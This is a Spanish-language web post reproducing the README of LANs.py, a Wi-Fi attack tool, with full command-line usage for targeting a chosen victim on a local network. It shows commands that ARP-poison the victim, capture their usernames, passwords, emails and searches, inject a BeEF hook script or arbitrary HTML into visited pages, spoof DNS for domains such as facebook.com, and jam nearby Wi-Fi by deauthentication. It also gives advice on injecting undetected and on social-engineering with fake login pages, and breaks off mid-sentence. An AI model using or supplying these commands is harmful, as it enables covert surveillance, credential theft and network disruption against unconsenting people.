Noticias de última hora

Inyectar código y espiar a los usuarios de wifi. Herramienta LANs.py



Enlace 1



Enlace 2




LANs.py






*** NOTA *** Ya no mantengo esto. Recomiendo usar bettercap en lugar de las necesidades de ARP y MITM.
  • Encuentre automáticamente a los usuarios de WLAN más activos y espíe a uno de ellos y / o inyecte HTML / JS arbitrario en las páginas que visite.
    • Envenena individualmente las tablas ARP del cuadro de destino, el enrutador y el servidor DNS si es necesario. No envenena a nadie más en la red. Muestra todos los bits más interesantes de su tráfico y puede inyectar html personalizados en las páginas que visitan. Se limpia después de sí mismo.
  • También se puede utilizar para interrumpir continuamente las redes WiFi cercanas. Esto tiene un rango aproximado de un radio de 1 bloque, pero puede variar según la intensidad de su tarjeta WiFi. Esto se puede ajustar para permitir la interferencia de todos o incluso de un solo cliente. (No se puede bloquear WiFi y espía simultáneamente)
Requisitos previos: Linux, python-scapy, python-nfqueue (nfqueue-bindings 0.4-3), aircrack-ng, python-twisted, BeEF (opcional), nmap, nbtscan, y una tarjeta inalámbrica capaz de modo promiscuo si no desea usa la opción -ip
Probado en Kali 1.0. En los siguientes ejemplos, 192.168.0.5 será la máquina atacante y 192.168.0.10 será la víctima.
Todas las opciones:
Python LANs.py [-h] [-b BEEF] [-c CÓDIGO] [-u] [-ip IPADDRESS] [-vmac VICTIMMAC]
[-d] [-v] [-dns DNSSPOOF] [-a] [-set] [-p] [-na] [-n]

[-i INTERFAZ] [-r REDIRECTTO] [-rip ROUTERIP]

[-rmac ROUTERMAC] [-pcap PCAP] [-s SKIP] [-ch CANAL]

[-m MAXIMO] [-no] [-t TIMEINTERVAL] [--paquetes PAQUETES]

[--directedonly] [--accesspoint ACCESSPOINT]

#Uso

Uso común:

Python LANs.py -u -p
La identificación de objetivo activo que ARP falsifica el objetivo elegido y genera todos los datos interesantes que no son HTTPS que envían o solicitan. No hay opción -ip, por lo que ARP escaneará la red, la comparará con una captura promiscua que se ejecuta en vivo y mostrará una lista de todos los clientes de la red. Intenta etiquetar los objetivos con un nombre de netbios de Windows e imprime cuántos paquetes de datos están enviando / recibiendo. La capacidad de capturar paquetes de datos que envían depende en gran medida de la proximidad física y del poder de su tarjeta de red. Ctrl-C cuando esté listo y elija su objetivo, que luego será ARP spoof.
Admite la interceptación y recolección de datos de los siguientes protocolos: HTTP, FTP, IMAP, POP3, IRC. Imprimirá los primeros 135 caracteres de las URL visitadas e ignorará las URL que terminan en .jpg, .jpeg, .gif, .css, .ico, .js, .svg y .woff. También imprimirá todos los nombres de usuario / contraseñas del protocolo, las búsquedas realizadas en cualquier sitio, los correos electrónicos enviados / recibidos y los mensajes IRC enviados / recibidos. Captura de pantalla: http://i.imgur.com/kQfTYP.png
Ejecutar LANs.py sin argumentos le dará la lista de objetivos activos y al seleccionar uno, actuará como un simple spoofer ARP.

Otro uso común:

python LANs.py -u -p -d -ip 192.168.0.10
-d: abre un xterm con driftnet para ver todas las imágenes que ven
-ip: apunta a esta dirección IP y omite la orientación activa al principio

Inyección de HTML:

python LANs.py -b http://192.168.0.5:3000/hook.js
Inyecte una URL de enlace de BeEF ( http://beefproject.com/ , tutorial: http://resources.infosecinstitute.com/beef-part-1/ ) en las páginas que la víctima visita. Esto simplemente envuelve el argumento en las <script>etiquetas para que realmente pueda ingresar cualquier ubicación de un archivo javascript. Intenta insertarlo después de la primera etiqueta que se encuentra en el HTML de la página.
python LANs.py -c ' <title> Propio. </title> '
Inyectar HTML arbitrario en las páginas que la víctima visita. Primero intenta inyectarlo después de la primera <head>etiqueta y si falla, inyecta antes de la primera </head>etiqueta. Este ejemplo cambiará el título de la página a "Propiedad".

Leer de pcap:

python LANs.py -pcap libpcapfilename -ip 192.168.0.10
Para leer un archivo pcap, debe incluir la dirección IP del objetivo con la opción -ip. También debe estar en formato libpcap, que es el más común de todos modos. Una de las ventajas de leer un archivo pcap es que no necesita ser root para ejecutar el script.

Falsificación de DNS

python LANs.py -a -r 80.87.128.67
python LANs.py -dns eff.org
Ejemplo 1: la opción -a simulará cada solicitud de DNS que realice la víctima y cuando se use junto con -r, la redireccionará a la dirección de argumento de -r. La víctima será redirigida a stallman.org (80.87.128.67) sin importar lo que escriba en la barra de direcciones.
Ejemplo 2: Esto falsificará el dominio eff.org y los subdominios de eff.org. Cuando no hay un argumento -r presente con los argumentos -a o -dns, la secuencia de comandos enviará a la víctima a la dirección IP del atacante. Si la víctima intenta ir a eff.org, será redirigida a la IP del atacante.

El uso más agresivo:

python LANs.py -v -d -p -n -na -set -a -r 80.87.128.67 -c ' <title> Owned. </title> ' -b http://192.168.0.5:3000/hook. js -ip 192.168.0.10

Atascar todas las redes WiFi:

python lans.py

Todas las opciones:


Uso normal:
  • -b BEEF_HOOK_URL: copie la URL de enlace de BeEF para inyectarla en cada página que visite la víctima, por ejemplo: -b http://192.168.1.10:3000/hook.js
  • -c 'CÓDIGO HTML': inyecte código HTML arbitrario en las páginas que la víctima visita; Incluir las citas al seleccionar HTML para inyectar.
  • -d: abre un xterm con driftnet para ver todas las imágenes que ven
  • -dns DOMAIN: suplantación del DNS de DOMAIN. por ejemplo, -dns facebook.com hará una copia del DNS de cada solicitud de DNS a facebook.com o subdomain.facebook.com
  • -a: suplantación de todas las respuestas de DNS que hace la víctima, creando efectivamente una página de portal cautiva; La opción -r puede ser usada con esto
  • -r IPADDRESS: solo se utiliza con la opción DOMINIO de -dns; redirigir al usuario a este IPADDRESS cuando visitan DOMAIN
  • -u: imprime las URL visitadas; se trunca a 150 caracteres y filtra las URL de imagen / css / js / woff / svg, ya que envían spam a la salida y no son interesantes
  • -i INTERFAZ: especifique la interfaz; por defecto es la primera interfaz ip route, por ejemplo: -i wlan0
  • -ip: apuntar a esta dirección IP
  • -n: realiza un rápido escaneo de nmap del objetivo
  • -na: realiza un escaneo de nmap agresivo en el fondo y envía a [dirección IP de la víctima] .nmap.txt
  • -p: imprime nombre de usuario / contraseñas para FTP / IMAP / POP / IRC / HTTP, HTTP POSTs, todas las búsquedas realizadas, correos electrónicos entrantes / salientes y mensajes IRC enviados / recibidos
  • -pcap PCAP_FILE: analiza todos los paquetes en un archivo pcap; requiere el argumento -ip [dirección IP del objetivo]
  • -rmac ROUTER_MAC: ingrese el enrutador MAC aquí si tiene problemas para obtener la secuencia de comandos para recuperarlo automáticamente
  • -rip ROUTER_IP: ingrese el IP del enrutador aquí si tiene problemas para obtener la secuencia de comandos para recuperarla automáticamente
  • -v: muestra direcciones URL detalladas que no se truncan a 150 caracteres como -u
Jamming Wifi:
  • -s MAC_Address_to_skip: especifique una dirección MAC para omitir deauthing. Ejemplo: -s 00: 11: BB: 33: 44: AA
  • -CH CANAL: Limita wifijammer a un solo canal
  • -m MAXIMO: Número máximo de clientes a deauth. Utilícelo si se mueve para evitar que se borren los pares cliente / AP fuera del rango actual.
  • -no: no borre la lista deauth cuando se alcanza el número máximo (-m) de combinaciones de cliente / AP. Debe utilizarse junto con -m. Ejemplo: -m 10 -n
  • -t TIME_INTERVAL: Tiempo entre cada paquete deauth. El valor predeterminado es el máximo. Si ve errores de scapy como 'no hay espacio en el búfer', intente: -t .00001
  • --packets NUMBER: Número de paquetes a enviar en cada ráfaga deauth. El valor predeterminado es 1 paquete.
  • --directedonly: no envíe paquetes deauth a la dirección de transmisión de los AP y solo envíe a los pares cliente / AP
  • --accesspoint ROUTER_MAC: ingrese la dirección MAC de un AP específico para apuntar.

Limpiar

Al recibir un Ctrl-C:
-Desactiva el reenvío de IP
-Fushea iptables firewall
-Restaura individualmente las tablas ARP del enrutador y la víctima

Detalles técnicos

Esta secuencia de comandos utiliza una cola python nfqueue-bindings envuelta en un IReadDescriptor Twisted para enviar paquetes a las funciones de devolución de llamada. nfqueue-bindings se usa para soltar y reenviar ciertos paquetes. La biblioteca Scapy de Python hace el trabajo de analizar e inyectar paquetes.
Inyectar el código sin ser detectado es un juego peligroso, si una cosa pequeña sale mal o si el servidor al que la víctima solicita datos realiza tareas de forma única o rara, el usuario no podrá abrir la página que está intentando ver y Sabré que algo está pasando. Esta secuencia de comandos está diseñada para reenviar paquetes si algo falla durante el uso, es posible que vea muchos "[!] Paquete inyectado para www.dominio.com " pero solo vea uno o dos dominios en el panel de BEeF en los que está conectado el navegador. Esto esta bien. Si no se enganchan en la primera página, simplemente espere a que naveguen otras páginas. El objetivo es pasar desapercibido. Mis herramientas BEeF favoritas están en Comandos> Ingeniería social. Haga cosas como crear un Facebook de aspecto oficial que diga el usuario '

No hay comentarios